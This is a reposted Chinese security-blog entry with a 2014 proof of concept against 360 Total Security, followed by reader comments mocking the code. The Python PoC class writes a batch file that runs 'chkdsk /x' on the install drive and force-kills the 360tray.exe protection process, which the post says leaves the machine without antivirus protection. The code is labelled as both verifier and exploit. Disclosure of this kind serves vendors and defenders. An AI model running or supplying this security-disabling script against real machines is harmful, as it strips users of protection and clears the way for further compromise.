360安全卫士chkdsk taskkill主进程 POC

admin 2021年4月2日20:27:24评论140 views字数 1706阅读5分41秒阅读模式

测试使用Windows XP SP3,VMware Workstation 10.0.3。

经测试,如果360安全卫士(其实不止360一家)安装在非系统盘(360自身默认安装在非系统盘), 然后对其所在盘符进行chkdsk /x 操作,其主防进程360tray.exe会自动强行退出,从而完全失去保护能力。

#!/usr/bin/env python
# coding=utf-8

"""
Site: [url]http://www.beebeeto.com/[/url]
Framework: 
""" from baseframe import BaseFrame class MyPoc(BaseFrame): poc_info = { # poc相关信息 'poc': { 'id': 'poc-2014-0152', 'name': '360安全卫士安装非默认路径 chkdsk taskkill主进程 POC', 'author': '雷蜂', 'create_date': '2014-11-19', }, # 协议相关信息 'protocol': { 'name': 'local', 'port': [0], 'layer3_protocol': [], }, # 漏洞相关信息 'vul': { 'app_name': '360', 'vul_version': ['*'], 'type': 'Other', 'tag': ['本地提权', '杀掉360主进程', 'chkdsk taskkill', '360漏洞'], 'desc': ''' Wooyun Author zhuixing: 测试使用Windows XP SP3,VMware Workstation 10.0.3。 经测试,如果360安全卫士(其实不止360一家)安装在非系统盘(360自身默认安装在非系统盘), 然后对其所在盘符进行chkdsk /x 操作,其主防进程360tray.exe会自动强行退出,从而完全失去保护能力。 ''', 'references': ['http://wooyun.org/bugs/wooyun-2014-078641', ], }, } @classmethod def verify(cls, args): verify_url = args['options']['target'] payload = ''' @echo off chkdsk /x e: taskkill /F /IM 360tray.exe /T ''' # write test_bat = open('./360-taskkill.bat', 'w') test_bat.write(payload) test_bat.close() args['success'] = True args['poc_ret']['vul_url'] = 'Generation ok, file: ./360-taskkill.bat' return args exploit = verify if __name__ == '__main__': from pprint import pprint mp = MyPoc() pprint(mp.run())

留言评论(旧系统):

佚名 @ 2014-11-27 21:40:40

支持windows的baseframe?

本站回复:

so?

兔草 @ 2014-11-28 09:58:28

无力吐槽这软文~~ 写一大堆python就为了写入一个bat。。。

本站回复:

哈哈哈哈哈哈

RainShine @ 2014-11-28 12:38:19

雷蜂?雷锋?

本站回复:

蜂!

佚名 @ 2014-11-30 20:57:02

bat都写得这么高大上 顿时觉得黑阔的世界好深。。。

本站回复:

-_-|||

佚名 @ 2014-12-01 00:08:40

我有一个问题 (不知道在那里提问 只好借这个帖子里问了)

乌云(www.wooyun.org)是不是改版了
搜索出错 不能进行搜索
网页源码 “

好像没有吧,好几没去了,不清楚。

佚名 @ 2014-12-01 04:07:33

我喜欢把简单变复杂的代码。。。 高大上

本站回复:

-_-|||

文章来源于lcx.cc:360安全卫士chkdsk taskkill主进程 POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日20:27:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   360安全卫士chkdsk taskkill主进程 POChttp://cn-sec.com/archives/317427.html

发表评论

匿名网友 填写信息